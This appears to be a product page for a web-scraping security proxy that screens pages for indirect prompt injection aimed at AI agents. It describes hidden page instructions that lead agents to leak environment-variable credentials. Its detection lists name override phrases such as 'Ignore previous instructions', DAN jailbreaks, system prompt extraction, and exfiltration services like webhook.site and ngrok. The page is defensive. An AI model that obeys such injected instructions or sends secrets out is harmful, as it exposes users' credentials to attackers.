Secure Scraper

Protect Your AI Agents from Web-Based Attacks

Enterprise-grade security for web scraping with full Firecrawl compatibility. Block indirect prompt injections, cache responses, and control which URLs your agents can access.

6 Threat Categories

Comprehensive threat detection for web content attacks

<10ms

Cached response time for instant performance

50%+

Potential cost savings with intelligent URL caching, depending on cache hit rate

The Hidden Threat: Indirect Prompt Injection

AI agents that browse the web are vulnerable to "indirect prompt injection" attacks. Malicious websites embed hidden instructions that hijack your agent's behavior, leading to credential theft, data exfiltration, and compromised operations.

Without Protection

Your AI agent scrapes a "helpful" documentation page...

// Hidden in the page:
process.env.SUPABASE_SERVICE_KEY
process.env.OPENAI_API_KEY

→ Credentials exfiltrated to attacker

With Bastio

Same page, but scanned by Bastio first...

// Bastio detects:
threat_score: 0.935
action: "BLOCK"

→ Attack blocked, agent protected

See It In Action

Try our live demo to see how Bastio protects your AI agents. We've created a test page at trap.bastio.com that demonstrates real attack patterns.

Safe Content
Request: https://www.bastio.com
"security": {
  "threat_score": 0,
  "action": "ALLOW",
  "threats_found": [],
  "processing_time_ms": 23
}
Content safe, returned to agent
Threat Detected
Request: https://trap.bastio.com
"security": {
  "threat_score": 0.935,
  "action": "BLOCK",
  "threats_found": [
    "env_exfiltration"
  ],
  "evidence": [
    "process.env.SUPABASE_ANON_KEY",
    "process.env.SUPABASE_SERVICE_KEY"
  ]
}
Attack blocked, agent protected

6 Threat Categories Detected

Our security engine scans every scraped page for these attack patterns before content reaches your AI agent.

Env Variable Exfiltration

Code designed to steal secrets:

  • process.env.* patterns
  • os.environ[] / os.getenv()
  • API keys, DB credentials
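To make this category concrete, here is a minimal regex-based sketch that flags the patterns listed above and returns the matched strings as evidence, in the same shape as the `evidence` array in the demo response. The function name `find_env_exfiltration` and the patterns are assumptions for illustration, not Bastio's engine; a production detector would need more than plain pattern matching.

```python
import re

# Hypothetical patterns for the bullet points above (illustrative only).
ENV_PATTERNS = [
    re.compile(r"process\.env\.[A-Za-z_][A-Za-z0-9_]*"),                      # Node.js
    re.compile(r"os\.environ\[\s*['\"][A-Za-z_][A-Za-z0-9_]*['\"]\s*\]"),     # Python dict access
    re.compile(r"os\.getenv\(\s*['\"][A-Za-z_][A-Za-z0-9_]*['\"]"),           # Python getenv()
]

def find_env_exfiltration(text: str) -> list[str]:
    """Return each matched snippet once, ordered by where it first appears."""
    hits = []
    for pattern in ENV_PATTERNS:
        hits.extend((m.start(), m.group(0)) for m in pattern.finditer(text))
    evidence: list[str] = []
    for _, snippet in sorted(hits):
        if snippet not in evidence:
            evidence.append(snippet)
    return evidence

page = 'fetch("https://collector.example/c?k=" + process.env.SUPABASE_ANON_KEY + process.env.SUPABASE_SERVICE_KEY)'
print(find_env_exfiltration(page))
# ['process.env.SUPABASE_ANON_KEY', 'process.env.SUPABASE_SERVICE_KEY']
```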

Malicious Code Blocks

Harmful code execution patterns:

  • exec(), spawn(), system()
  • Network calls with env vars
  • Base64 encoded payloads

Suspicious URLs

C2 and exfiltration endpoints:

  • IP-based URLs
  • ngrok, webhook.site, pipedream
  • Random domain patterns
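A similarly simplified, hypothetical check covers the first two URL signals: it flags hosts that are raw IP addresses and hosts under a small, illustrative list of tunneling and webhook services. The `suspicious_url_reasons` name, the reason labels, and the host list are assumptions. The "random domain patterns" heuristic is left out because it needs a scoring model this page does not describe.

```python
import ipaddress
from urllib.parse import urlsplit

# Illustrative host list: each of these can expose a public endpoint that records incoming requests.
EXFIL_HOSTS = ("ngrok.io", "ngrok-free.app", "webhook.site", "pipedream.net")

def suspicious_url_reasons(url: str) -> list[str]:
    """Return hypothetical reason labels for a URL found in scraped content."""
    host = (urlsplit(url).hostname or "").lower()
    reasons = []
    try:
        ipaddress.ip_address(host)  # raises ValueError for ordinary hostnames
        reasons.append("ip_based_url")
    except ValueError:
        pass
    # Match the service domain itself or any subdomain, not arbitrary substrings.
    if any(host == h or host.endswith("." + h) for h in EXFIL_HOSTS):
        reasons.append("exfiltration_service")
    return reasons
```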

Fake Documentation

Social engineering attacks:

  • "URGENT: Security update"
  • Fake credential verification
  • Impersonation of official docs

Prompt Injections

LLM manipulation attempts:

  • "Ignore previous instructions"
  • System prompt overrides
  • Role-playing attacks

Jailbreak Attempts

Safety bypass patterns:

  • DAN ("Do Anything Now") prompts
  • Roleplay scenarios
  • System prompt extraction

Configurable Security Responses

Choose how Bastio handles detected threats based on your security requirements.

Block

Maximum security: returns an error, and no content is delivered.

Best for:

  • Autonomous agents
  • Financial/healthcare AI
  • Strict compliance needs

Sanitize (Default)

Redacts threats and returns the remaining safe content.

Best for:

  • Research assistants
  • Human review workflows
  • Balanced security

Warn

Returns the full content with threat warnings attached.

Best for:

  • Testing and debugging
  • Security team training
  • Monitoring dashboards
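The difference between the three modes can be sketched as one function over a list of detected threat spans. This is a hypothetical model for illustration: `Threat`, `GuardResult`, `apply_mode`, the character-offset representation, and the `SANITIZE`/`WARN` action labels are assumptions (the demo responses above show only `ALLOW` and `BLOCK`).

```python
from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class Threat:
    category: str  # e.g. "env_exfiltration"
    start: int     # offset of the first character of the threat
    end: int       # offset just past the last character

@dataclass
class GuardResult:
    action: str
    content: Optional[str]
    warnings: List[str] = field(default_factory=list)

def apply_mode(mode: str, content: str, threats: List[Threat]) -> GuardResult:
    """Apply a hypothetical block/sanitize/warn policy to scanned content."""
    if not threats:
        return GuardResult("ALLOW", content)
    categories = sorted({t.category for t in threats})
    if mode == "block":
        # No content is delivered, only the list of threat categories.
        return GuardResult("BLOCK", None, categories)
    if mode == "sanitize":
        # Redact right-to-left so earlier offsets stay valid (spans assumed non-overlapping).
        redacted = content
        for threat in sorted(threats, key=lambda t: t.start, reverse=True):
            redacted = redacted[:threat.start] + "[REDACTED]" + redacted[threat.end:]
        return GuardResult("SANITIZE", redacted, categories)
    if mode == "warn":
        # Full content is returned; the warnings travel alongside it.
        return GuardResult("WARN", content, categories)
    raise ValueError(f"unknown mode: {mode!r}")
```

Keeping the mode a single parameter mirrors the idea that the same scan result feeds all three responses; only the delivery policy changes.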

Intelligent Caching

Reduce scraping costs and improve performance with automatic URL caching. Each proxy maintains an independent 24-hour cache.

Cost Savings

Hit Rate | Monthly Scrapes | Savings
30% | 10,000 | $3
40% | 50,000 | $20
50% | 100,000 | $50
50% | 500,000 | $250
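The savings column is consistent with a simple calculation: each cache hit avoids one billed scrape, priced here at $0.001 per URL (the overage rate listed under Simple Pricing). The sketch below reproduces the table under that assumption; `estimated_savings` is a hypothetical helper, and actual savings depend on your plan and traffic.

```python
def estimated_savings(hit_rate: float, monthly_scrapes: int,
                      cost_per_url: float = 0.001) -> float:
    """Monthly dollars saved when cache hits avoid billed scrapes.

    Assumes every hit would otherwise have cost `cost_per_url`.
    """
    return round(hit_rate * monthly_scrapes * cost_per_url, 2)

# Reproduce the rows of the table above.
for rate, scrapes in [(0.30, 10_000), (0.40, 50_000), (0.50, 100_000), (0.50, 500_000)]:
    print(f"{rate:.0%} hit rate, {scrapes:,} scrapes: ${estimated_savings(rate, scrapes):,.0f}")
```

Because savings scale linearly with hit rate, a 50% hit rate cuts per-URL scraping spend roughly in half.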

Performance Boost

Fresh scrape: 1-3 seconds
Cached response: <10ms

Cached responses are re-scanned for threats on every request, so serving a page from cache never bypasses threat detection.
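Bastio's cache internals are not documented here; the sketch below shows one way to get the two properties described above: a per-proxy cache whose entries live for 24 hours, and threat scanning on every request, hits included. `ProxyCache`, `fetch`, and `scan` are hypothetical names, and caching raw content rather than scan verdicts is a design assumption.

```python
import time
from typing import Callable, Dict, Tuple

CACHE_TTL_SECONDS = 24 * 60 * 60  # 24-hour lifetime per cached URL

class ProxyCache:
    """Hypothetical cache owned by a single proxy; stores page content, not verdicts."""

    def __init__(self, fetch: Callable[[str], str], scan: Callable[[str], dict],
                 clock: Callable[[], float] = time.monotonic):
        self._fetch = fetch    # performs a fresh (slow, billed) scrape
        self._scan = scan      # threat analysis, run on every request
        self._clock = clock    # injectable for testing
        self._entries: Dict[str, Tuple[float, str]] = {}

    def get(self, url: str) -> Tuple[str, dict, bool]:
        """Return (content, security_report, cache_hit) for a URL."""
        now = self._clock()
        entry = self._entries.get(url)
        cache_hit = entry is not None and now - entry[0] < CACHE_TTL_SECONDS
        if cache_hit:
            content = entry[1]
        else:
            content = self._fetch(url)
            self._entries[url] = (now, content)
        # Scan hits and misses alike, so cached pages get the latest detection rules.
        return content, self._scan(content), cache_hit
```

Giving each proxy its own `ProxyCache` instance keeps the caches independent, and storing content instead of verdicts means a newly added detection rule also applies to pages cached before it existed.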

URL Control: Allow-Lists & Block-Lists

Defense-in-depth for autonomous agents. Control exactly which domains your AI can access.

Allow-List

Restrict your agent to trusted sources only:

"allowed_domains": [
  "docs.python.org",
  "docs.aws.amazon.com",
  "cloud.google.com/docs"
]

Block-List

Block known problematic domains:

"blocked_domains": [
  "pastebin.com",
  "hastebin.com",
  "webhook.site"
]
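The exact matching rules are not spelled out above, so the sketch below assumes one reasonable set: a domain entry also covers its subdomains, an entry with a path (such as `cloud.google.com/docs`) additionally requires that path prefix, the block-list always wins, and an empty allow-list permits everything not blocked. `is_url_permitted` is a hypothetical helper, not Bastio's API.

```python
from urllib.parse import urlsplit

def _entry_matches(entry: str, host: str, path: str) -> bool:
    """True if a list entry (domain, optionally with a path prefix) covers host + path."""
    domain, _, prefix = entry.partition("/")
    domain = domain.lower()
    host_ok = host == domain or host.endswith("." + domain)  # domain or any subdomain
    if not prefix:
        return host_ok
    prefix = "/" + prefix.rstrip("/")
    return host_ok and (path == prefix or path.startswith(prefix + "/"))

def is_url_permitted(url: str, allowed_domains: list[str], blocked_domains: list[str]) -> bool:
    """Hypothetical policy: block-list first, then allow-list (if one is configured)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path or "/"
    if any(_entry_matches(e, host, path) for e in blocked_domains):
        return False  # the block-list always wins
    if allowed_domains:
        return any(_entry_matches(e, host, path) for e in allowed_domains)
    return True  # no allow-list: anything not blocked is permitted

allowed = ["docs.python.org", "docs.aws.amazon.com", "cloud.google.com/docs"]
blocked = ["pastebin.com", "hastebin.com", "webhook.site"]
print(is_url_permitted("https://cloud.google.com/docs/run", allowed, blocked))  # True
print(is_url_permitted("https://cloud.google.com/pricing", allowed, blocked))   # False
```

Matching with `host == domain or host.endswith("." + domain)` rather than a substring test keeps a lookalike such as `docs.python.org.attacker.net` from being treated as trusted.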

Drop-In Firecrawl Replacement

Full Firecrawl v2 API compatibility. To switch, point your client at your Bastio proxy endpoint and authenticate with your Bastio API key; request bodies stay the same.

Before (Firecrawl)
POST https://api.firecrawl.dev/v2/scrape
After (Bastio)
POST https://api.bastio.com/v1/guard/{proxyID}/scrape
Python Example
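import os
import requests

# Read credentials from the environment (these variable names are illustrative)
PROXY_ID = os.environ["BASTIO_PROXY_ID"]
BASTIO_API_KEY = os.environ["BASTIO_API_KEY"]

response = requests.post(
    f"https://api.bastio.com/v1/guard/{PROXY_ID}/scrape",
    headers={"Authorization": f"Bearer {BASTIO_API_KEY}"},
    json={"url": "https://www.bastio.com", "formats": ["markdown"]},
    timeout=60,  # fresh scrapes can take a few seconds
)

result = response.json()
security = result["security"]
if security["action"] == "BLOCK":
    # Blocked pages deliver no content, only the threat summary
    print(f"Threat blocked: {security['threats_found']}")
else:
    # Otherwise the page comes back in Firecrawl's data.markdown field
    content = result["data"]["markdown"]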

Built for AI Agents

Research Assistants

Safely retrieve and process documentation, papers, and web content without risking credential theft.

  • Safe document retrieval
  • Sanitized web content

MCP Tool Servers

Secure web browsing tools for Model Context Protocol servers. Protect your MCP infrastructure.

  • Protected fetch tools
  • URL validation layer

Function Calling

Protected URL fetch tools for OpenAI function calling and Anthropic tool use.

  • OpenAI tools integration
  • Anthropic tool use
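For function calling, the protected fetch can be exposed as an ordinary tool. The sketch below defines the tool schema in OpenAI's Chat Completions `tools` format and the equivalent Anthropic `input_schema` form, plus a handler that calls the scrape endpoint using only the standard library. The tool name `secure_fetch`, the environment variable names, and the assumption that a blocked scrape may arrive as an HTTP error with a JSON body are all illustrative.

```python
import json
import os
import urllib.error
import urllib.request

# Tool schema in OpenAI's Chat Completions "tools" format.
FETCH_TOOL = {
    "type": "function",
    "function": {
        "name": "secure_fetch",  # hypothetical tool name
        "description": "Fetch a web page as markdown after Bastio threat scanning.",
        "parameters": {
            "type": "object",
            "properties": {"url": {"type": "string", "description": "URL of the page to fetch"}},
            "required": ["url"],
        },
    },
}

# The same tool in Anthropic's tool-use format reuses the JSON Schema.
ANTHROPIC_FETCH_TOOL = {
    "name": FETCH_TOOL["function"]["name"],
    "description": FETCH_TOOL["function"]["description"],
    "input_schema": FETCH_TOOL["function"]["parameters"],
}

def tool_output(result: dict) -> str:
    """Turn a scrape response into the text handed back to the model."""
    security = result.get("security", {})
    if security.get("action") == "BLOCK":
        # Never forward blocked content; report the threat categories instead.
        threats = ", ".join(security.get("threats_found", [])) or "unspecified threat"
        return f"Fetch blocked by security scan ({threats})."
    return result.get("data", {}).get("markdown", "")

def secure_fetch(url: str) -> str:
    """Handler for the tool call; env var names are illustrative."""
    endpoint = f"https://api.bastio.com/v1/guard/{os.environ['BASTIO_PROXY_ID']}/scrape"
    request = urllib.request.Request(
        endpoint,
        data=json.dumps({"url": url, "formats": ["markdown"]}).encode(),
        headers={
            "Authorization": f"Bearer {os.environ['BASTIO_API_KEY']}",
            "Content-Type": "application/json",
        },
        method="POST",
    )
    try:
        with urllib.request.urlopen(request, timeout=60) as response:
            return tool_output(json.load(response))
    except urllib.error.HTTPError as err:
        # Assumption: a blocked scrape may come back as an HTTP error with a JSON body.
        try:
            return tool_output(json.load(err))
        except ValueError:
            return f"Fetch failed with HTTP {err.code}."
```

Returning a short refusal string instead of raising lets the model see that the page was blocked and choose another source, which suits the unattended agents described below.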

Autonomous Agents

Defense-in-depth for agents operating without human oversight. Block mode recommended.

  • AutoGPT, BabyAGI patterns
  • LangGraph workflows

Simple Pricing

Platform-Managed

Bastio handles Firecrawl credits for you:

Tier | Included | Overage
Free | 100/month | n/a
Starter | 10,000/month | $0.001/URL
Pro | 100,000/month | $0.001/URL
Enterprise | Unlimited | Included

BYOK Mode

Bring your own Firecrawl API key:

Firecrawl costs: billed to you
Bastio security fee: $0.0005/URL

Same threat detection and caching. Ideal for enterprises with existing Firecrawl contracts.
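As a rough cost check, the sketch below computes platform-managed overage and the BYOK security fee from the per-URL rates in the tables above. Base plan prices are not listed, so it covers only per-URL charges; the function names are hypothetical, and treating the Free tier as a hard 100-URL cap (its overage column is empty) is an assumption.

```python
# Per-URL rates from the pricing tables above. Enterprise (unlimited) is omitted.
TIERS = {
    "free": (100, None),          # no overage rate listed
    "starter": (10_000, 0.001),
    "pro": (100_000, 0.001),
}
BYOK_FEE_PER_URL = 0.0005

def platform_overage(tier: str, urls_per_month: int) -> float:
    """Overage dollars for a platform-managed tier (base plan price excluded)."""
    included, rate = TIERS[tier]
    extra = max(0, urls_per_month - included)
    if extra and rate is None:
        # Assumption: the Free tier is a hard cap rather than pay-as-you-go.
        raise ValueError(f"{tier} tier includes only {included} URLs per month")
    return round(extra * (rate or 0.0), 2)

def byok_security_fee(urls_per_month: int) -> float:
    """Bastio's per-URL fee in BYOK mode; Firecrawl bills its own costs separately."""
    return round(urls_per_month * BYOK_FEE_PER_URL, 2)
```

For example, 15,000 URLs on Starter adds $5.00 in overage (5,000 × $0.001), while the same volume in BYOK mode costs $7.50 in Bastio fees plus your Firecrawl charges.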

Protect Your AI Agents Today

Start with 100 free secure scrapes per month. Full Firecrawl compatibility with enterprise-grade threat detection.

Need help implementing secure scraping? Contact us for a free consultation.